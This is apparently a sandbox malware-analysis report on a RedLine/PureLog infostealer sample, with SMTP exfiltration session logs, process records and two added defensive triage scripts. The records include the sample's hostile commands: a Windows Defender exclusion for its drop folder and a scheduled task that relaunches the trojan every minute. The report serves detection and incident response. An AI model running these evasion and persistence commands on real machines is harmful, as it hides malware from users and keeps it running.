2024-11-05 16:02:52 UTC | 14 | IN | Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36
Data Ascii: 173.254.250.76


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Nov 5, 2024 17:02:55.403208017 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 05 Nov 2024 16:02:55 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Nov 5, 2024 17:02:55.403467894 CET | 49711 | 587 | 192.168.2.5 | 51.195.88.199 | EHLO 141700
Nov 5, 2024 17:02:55.647495985 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5 | 250-s82.gocheapweb.com Hello 141700 [173.254.250.76]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Nov 5, 2024 17:02:55.647650957 CET | 49711 | 587 | 192.168.2.5 | 51.195.88.199 | STARTTLS
Nov 5, 2024 17:02:55.891474962 CET | 587 | 49711 | 51.195.88.199 | 192.168.2.5 | 220 TLS go ahead
Nov 5, 2024 17:02:59.881762981 CET | 587 | 59400 | 51.195.88.199 | 192.168.2.5 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 05 Nov 2024 16:02:59 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Nov 5, 2024 17:02:59.881983995 CET | 59400 | 587 | 192.168.2.5 | 51.195.88.199 | EHLO 141700
Nov 5, 2024 17:03:00.124954939 CET | 587 | 59400 | 51.195.88.199 | 192.168.2.5 | 250-s82.gocheapweb.com Hello 141700 [173.254.250.76]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Nov 5, 2024 17:03:00.125657082 CET | 59400 | 587 | 192.168.2.5 | 51.195.88.199 | STARTTLS
Nov 5, 2024 17:03:00.370814085 CET | 587 | 59400 | 51.195.88.199 | 192.168.2.5 | 220 TLS go ahead
Nov 5, 2024 17:04:39.067101002 CET | 587 | 59818 | 51.195.88.199 | 192.168.2.5 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 05 Nov 2024 16:04:38 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Nov 5, 2024 17:04:39.067435980 CET | 59818 | 587 | 192.168.2.5 | 51.195.88.199 | EHLO 141700
Nov 5, 2024 17:04:39.308449984 CET | 587 | 59818 | 51.195.88.199 | 192.168.2.5 | 250-s82.gocheapweb.com Hello 141700 [173.254.250.76]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-STARTTLS
250 HELP
Nov 5, 2024 17:04:39.308669090 CET | 59818 | 587 | 192.168.2.5 | 51.195.88.199 | STARTTLS
Nov 5, 2024 17:04:39.550003052 CET | 587 | 59818 | 51.195.88.199 | 192.168.2.5 | 220 TLS go ahead
Nov 5, 2024 17:04:42.460877895 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5 | 220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 05 Nov 2024 16:04:42 +0000
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Nov 5, 2024 17:04:42.461091995 CET | 59825 | 587 | 192.168.2.5 | 51.195.88.199 | EHLO 141700
Nov 5, 2024 17:04:42.699610949 CET | 587 | 59825 | 51.195.88.199 | 192.168.2.5 | 250-s82.gocheapweb.com Hello 141700 [173.254.250.76]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                              250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                              250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                              250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.699764013 CET59825587192.168.2.551.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.938277006 CET5875982551.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.000751972 CET5876201351.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 05 Nov 2024 16:04:51 +0000
                                                                                                                                                                                                                                                                                                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                                                                              220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.000935078 CET62013587192.168.2.551.195.88.199EHLO 141700
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.154167891 CET5876201451.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 05 Nov 2024 16:04:52 +0000
                                                                                                                                                                                                                                                                                                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                                                                                                                                                                                                                                              220 and/or bulk e-mail.
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.154310942 CET62014587192.168.2.551.195.88.199EHLO 141700
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.244342089 CET5876201351.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 141700 [173.254.250.76]
                                                                                                                                                                                                                                                                                                                                                                                                              250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                                                                              250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                                                                              250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                              250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                              250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                              250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.244560003 CET62013587192.168.2.551.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.398608923 CET5876201451.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 141700 [173.254.250.76]
                                                                                                                                                                                                                                                                                                                                                                                                              250-SIZE 52428800
                                                                                                                                                                                                                                                                                                                                                                                                              250-8BITMIME
                                                                                                                                                                                                                                                                                                                                                                                                              250-PIPELINING
                                                                                                                                                                                                                                                                                                                                                                                                              250-PIPECONNECT
                                                                                                                                                                                                                                                                                                                                                                                                              250-STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                              250 HELP
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.398778915 CET62014587192.168.2.551.195.88.199STARTTLS
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.505745888 CET5876201351.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:52.644256115 CET5876201451.195.88.199192.168.2.5220 TLS go ahead
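The rows above record the sample opening SMTP submission sessions (client ports 59818, 59825, 62013 and 62014) to s82.gocheapweb.com on 587/tcp, identifying itself with "EHLO 141700" and then issuing STARTTLS; once the server answers "220 TLS go ahead" the capture goes opaque, so the authentication and message body are not in the log. The following triage script is an added example, not part of the Joe Sandbox report or of the sample: it takes rows in the report's column order (timestamp, source port, destination port, source IP, destination IP, data), rebuilds each session by its client-side ephemeral port, and reports the EHLO name, the server greeting, the advertised extensions, the client address the MTA echoed back, and where the cleartext ends. The rows embedded below are transcribed from the table above; treating 192.168.2.5 as the sandbox client and 51.195.88.199 as the server is an assumption read off those rows.

```python
"""Rebuild the SMTP submission sessions recorded in a sandbox network log.

Added triage example: the rows below are transcribed from the Joe Sandbox SMTP
table for this sample. Nothing here is captured live.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

CLIENT_IP = "192.168.2.5"      # sandbox VM, as seen in the report's rows (assumption)
SERVER_IP = "51.195.88.199"    # s82.gocheapweb.com, 587/tcp

# Multi-line replies as they appear in the report; the greeting's clock differs per session.
GREETING = ("220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Tue, 05 Nov 2024 {} +0000\n"
            "220-We do not authorize the use of this system to transport unsolicited,\n"
            "220 and/or bulk e-mail.")
EHLO_REPLY = ("250-s82.gocheapweb.com Hello 141700 [173.254.250.76]\n250-SIZE 52428800\n"
              "250-8BITMIME\n250-PIPELINING\n250-PIPECONNECT\n250-STARTTLS\n250 HELP")

Row = Tuple[str, int, int, str, str, str]   # timestamp, src port, dst port, src IP, dst IP, data


def c2s(ts: str, port: int, data: str) -> Row: return (ts, port, 587, CLIENT_IP, SERVER_IP, data)
def s2c(ts: str, port: int, data: str) -> Row: return (ts, 587, port, SERVER_IP, CLIENT_IP, data)


ROWS: List[Row] = [                          # transcribed from the report (CET timestamps)
    c2s("17:04:39.308669090", 59818, "STARTTLS"),
    s2c("17:04:39.550003052", 59818, "220 TLS go ahead"),
    s2c("17:04:42.460877895", 59825, GREETING.format("16:04:42")),
    c2s("17:04:42.461091995", 59825, "EHLO 141700"),
    s2c("17:04:42.699610949", 59825, EHLO_REPLY),
    c2s("17:04:42.699764013", 59825, "STARTTLS"),
    s2c("17:04:42.938277006", 59825, "220 TLS go ahead"),
    s2c("17:04:52.000751972", 62013, GREETING.format("16:04:51")),
    c2s("17:04:52.000935078", 62013, "EHLO 141700"),
    s2c("17:04:52.154167891", 62014, GREETING.format("16:04:52")),
    c2s("17:04:52.154310942", 62014, "EHLO 141700"),
    s2c("17:04:52.244342089", 62013, EHLO_REPLY),
    c2s("17:04:52.244560003", 62013, "STARTTLS"),
    s2c("17:04:52.398608923", 62014, EHLO_REPLY),
    c2s("17:04:52.398778915", 62014, "STARTTLS"),
    s2c("17:04:52.505745888", 62013, "220 TLS go ahead"),
    s2c("17:04:52.644256115", 62014, "220 TLS go ahead"),
]


@dataclass
class Session:
    client_port: int
    server: str
    ehlo_name: Optional[str] = None
    banner: Optional[str] = None
    observed_ip: Optional[str] = None          # client address as the MTA echoed it back
    extensions: List[str] = field(default_factory=list)
    starttls_sent: bool = False
    tls_accepted: bool = False
    last_cleartext: Optional[str] = None


def rebuild_sessions(rows: List[Row], client_ip: str = CLIENT_IP) -> Dict[int, Session]:
    """Group rows by the client's ephemeral port and track the cleartext SMTP state."""
    sessions: Dict[int, Session] = {}
    for ts, sport, dport, sip, dip, data in rows:
        if sip == client_ip:
            port, from_client, server = sport, True, dip
        elif dip == client_ip:
            port, from_client, server = dport, False, sip
        else:
            continue                            # row does not involve the sandbox client
        s = sessions.setdefault(port, Session(client_port=port, server=server))
        lines = data.splitlines()
        if from_client:
            verb, _, arg = lines[0].partition(" ")
            if verb.upper() == "EHLO":
                s.ehlo_name = arg.strip()
            elif verb.upper() == "STARTTLS":
                s.starttls_sent = True
        else:
            code = lines[0][:3]
            if code == "220" and s.starttls_sent:
                s.tls_accepted = True          # "220 TLS go ahead": everything after this is encrypted
            elif code == "220":
                s.banner = lines[0][4:]        # server greeting: software, version and clock
            elif code == "250":
                m = re.search(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]", lines[0])
                s.observed_ip = m.group(1) if m else None
                s.extensions = [ln[4:] for ln in lines[1:]]
        s.last_cleartext = ts
    return sessions


def is_fqdn_or_literal(arg: str) -> bool:
    """RFC 5321 4.1.1.1: the EHLO argument is the client's FQDN or an address literal."""
    if arg.startswith("[") and arg.endswith("]"):
        return True
    labels = arg.split(".")
    return len(labels) >= 2 and all(lb and lb.replace("-", "").isalnum() for lb in labels)


def triage(sessions: Dict[int, Session]) -> List[str]:
    """Findings an analyst would pull from these sessions, one string each."""
    findings = []
    for server in sorted({s.server for s in sessions.values()}):
        to_server = [s for s in sessions.values() if s.server == server]
        upgraded = sum(1 for s in to_server if s.tls_accepted)
        findings.append(f"{server}:587: {len(to_server)} submission sessions, {upgraded} upgraded to TLS")
    for s in sorted(sessions.values(), key=lambda x: x.client_port):
        if s.ehlo_name is not None and not is_fqdn_or_literal(s.ehlo_name):
            findings.append(f"port {s.client_port}: EHLO argument {s.ehlo_name!r} is neither an FQDN "
                            "nor an address literal")
        if s.tls_accepted:
            findings.append(f"port {s.client_port}: cleartext ends at {s.last_cleartext}; any later "
                            "commands (AUTH, MAIL FROM, DATA) are encrypted and absent from the log")
    return findings
```

Run `triage(rebuild_sessions(ROWS))` to get the findings list; the per-port entries tell you at which timestamp each session went dark, which is the point at which a full-packet capture with the TLS session keys, or the sample's own SMTP credentials pulled from its configuration, would be needed to recover the exfiltrated content.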

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:45
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\AENiBH7X1q.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\AENiBH7X1q.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:5'301'537 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:FE364F6FF698A792C2F9527120136202
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:48
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\AENiBH7X1q.exe"
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0xe0000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:46'504 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.2120236907.0000000005800000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                                                                                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.2121412758.0000000006200000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

Target ID: 3
Start time: 11:02:48
Start date: 05/11/2024
Path: C:\Users\user\AppData\Local\Temp\microsofts.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\microsofts.exe"
Imagebase: 0x400000
File size: 1'425'408 bytes
MD5 hash: 1B1EC94BDE0A57A4A82BD2F20B2CB7F3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.2390841675.0000000007550000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.2396891377.0000000007550000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000003.2107829851.00000000006B6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, Author: ditekSHen
Reputation: low
Has exited: false

Target ID: 4
Start time: 11:02:48
Start date: 05/11/2024
Path: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe"
Imagebase: 0xab0000
File size: 587'776 bytes
MD5 hash: 8C8785AC6585CF5C794B74330B3DB88F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.2126254452.0000000012F52000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000000.2105969324.0000000000AB2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.2126254452.0000000012E79000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.2126254452.0000000012F07000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 5
Start time: 11:02:49
Start date: 05/11/2024
Path: C:\Windows\System32\alg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\alg.exe
Imagebase: 0x140000000
File size: 1'225'728 bytes
MD5 hash: 35184A2F5B6B06D8E814BA39A601EA5C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 6
Start time: 11:02:50
Start date: 05/11/2024
Path: C:\Users\user\AppData\Local\Temp\build.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\build.exe"
Imagebase: 0xde0000
File size: 307'712 bytes
MD5 hash: 3B6501FEEF6196F24163313A9F27DBFD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000000.2122053176.0000000000DE2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security
Reputation: low
Has exited: false

Target ID: 7
Start time: 11:02:50
Start date: 05/11/2024
Path: C:\Users\user\AppData\Local\Temp\server_BTC.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Imagebase: 0x990000
File size: 231'936 bytes
MD5 hash: 50D015016F20DA0905FD5B37D7834823
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:51
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                              File size:138'056 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:51
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                              File size:174'408 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:51
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:
                                                                                                                                                                                                                                                                                                                                                                                                              File size:154'952 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:51
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                              File size:1'348'608 bytes
                                                                                                                                                                                                                                                                                                                                                                                                              MD5 hash:C44491674DD9A23CD4DB0BCF383E02D9
                                                                                                                                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                                                                                                                                                                                              Start time:11:02:52
                                                                                                                                                                                                                                                                                                                                                                                                              Start date:05/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                              Wow64 process (32bit):true
Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:0x910000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:14
Start time:11:02:52
Start date:05/11/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 11:07 /du 23:59 /sc daily /ri 1 /f
Imagebase:0xdd0000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

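The two records above show the sample's persistence pair: a Windows Defender exclusion for the drop folder under AppData\Roaming, followed by a daily scheduled task (AccSys) that re-launches TrojanAIbot.exe from that folder every minute (/ri 1) for the whole day (/du 23:59). The PowerShell below is an added triage check, not part of the Joe Sandbox report or of the sample; it hunts a host for both artefacts. The task name, exclusion folder and executable name are taken from the report, the user-writable path pattern and the "short repetition interval" threshold are assumptions of the example, and it must run in an elevated session because Get-MpPreference and the task store need it.

```powershell
# Added triage check, not part of the Joe Sandbox report. It looks for the two
# persistence artefacts recorded in this analysis: a Windows Defender exclusion
# under a user profile, and a scheduled task whose action runs an executable from
# a user-writable location on a short repetition interval.
# Task name, exclusion folder and executable name come from the report; the
# path pattern and interval threshold are assumptions. Run elevated.

$suspectTaskName  = 'AccSys'
$suspectExclusion = 'ACCApi'
$suspectBinary    = 'TrojanAIbot.exe'

# Locations a standard user can write to; a task or exclusion pointing here is
# worth a look regardless of the name (assumed pattern, extend for your estate).
$userWritable = '(?i)\\Users\\[^\\]+\\AppData\\|\\ProgramData\\|\\Temp\\'

# 1. Defender exclusions: the sample adds one so its dropped payload is never scanned.
foreach ($path in (Get-MpPreference).ExclusionPath) {
    $flag = if ($path -match $userWritable -or $path -like "*$suspectExclusion*") { 'SUSPICIOUS' } else { 'info' }
    "[$flag] Defender ExclusionPath: $path"
}

# 2. Scheduled tasks whose action executes from a user-writable path, or whose
#    trigger repeats every few minutes (the report shows /ri 1, i.e. every minute).
Get-ScheduledTask | ForEach-Object {
    $task = $_
    foreach ($action in $task.Actions) {
        $exe = $action.Execute            # null for non-exec actions (COM handler etc.)
        if (-not $exe) { continue }
        $hits = @()
        if ($exe -match $userWritable)           { $hits += 'runs from user-writable path' }
        if ($exe -like "*$suspectBinary*")       { $hits += "matches $suspectBinary" }
        if ($task.TaskName -eq $suspectTaskName) { $hits += "task name $suspectTaskName" }
        foreach ($trigger in $task.Triggers) {
            # Repetition.Interval is an ISO 8601 duration, e.g. PT1M for one minute.
            $interval = $trigger.Repetition.Interval
            if ($interval -match '^PT(\d+)M$' -and [int]$Matches[1] -le 5) {
                $hits += "repeats every $($Matches[1]) min"
            }
        }
        if ($hits.Count -gt 0) {
            "[SUSPICIOUS] Task '$($task.TaskPath)$($task.TaskName)' -> $exe $($action.Arguments) : $($hits -join '; ')"
        }
    }
}

# 3. Remediation once a hit is confirmed. Remove the exclusion as well as the
#    task; deleting only the task leaves the drop folder unscanned.
# Unregister-ScheduledTask -TaskName $suspectTaskName -Confirm:$false
# Remove-MpPreference -ExclusionPath "$env:APPDATA\$suspectExclusion"
```

Note that Add-MpPreference succeeded here only because the sandbox ran the sample with administrator privileges (see "Has administrator privileges:true" on the powershell.exe record); on a standard user account the exclusion call fails while the schtasks persistence still works, so check scheduled tasks even when no exclusion is found.
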
Target ID:15
Start time:11:02:52
Start date:05/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:11:02:53
Start date:05/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:11:02:53
Start date:05/11/2024
Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Imagebase:0x2a0000
File size:231'936 bytes
MD5 hash:50D015016F20DA0905FD5B37D7834823
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:18
Start time:11:02:53
Start date:05/11/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpEAAD.tmp.cmd""
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:11:02:53
Start date:05/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
